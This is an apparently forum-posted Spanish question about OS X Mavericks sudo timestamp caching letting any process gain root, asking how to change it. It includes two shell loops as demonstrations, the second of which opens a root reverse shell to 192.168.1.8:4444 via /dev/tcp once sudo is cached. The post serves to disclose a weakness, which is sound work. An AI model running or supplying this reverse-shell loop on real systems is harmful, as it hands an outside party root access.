Recientemente he notado en OS X Mavericks que ejecutar sudo no solo permitirá que uno lo ejecute nuevamente en la misma ventana o incluso en la misma aplicación, sino que permitirá que cualquier aplicación ejecute comandos de shell como root. Esto significaría que cualquier aplicación que continuamente intente ejecutar sudo sin una contraseña en un bucle obtendría privilegios de root. ¿Hay alguna manera de cambiar esto?
Ejemplo de script de shell:
while (true) do
if [ 'echo ""|sudo -S whoami' = "root" ]; then
say root
echo root
exit
fi
done
Si eso se ejecuta en segundo plano y luego se ejecuta un comando sudo, dirá root y luego exit. Otro ejemplo que me preocuparía más es el siguiente:
while (true) do
if [ 'echo ""|sudo -S whoami' = "root" ]; then
bash -i > /dev/tcp/192.168.1.8/4444 0>&1
fi
done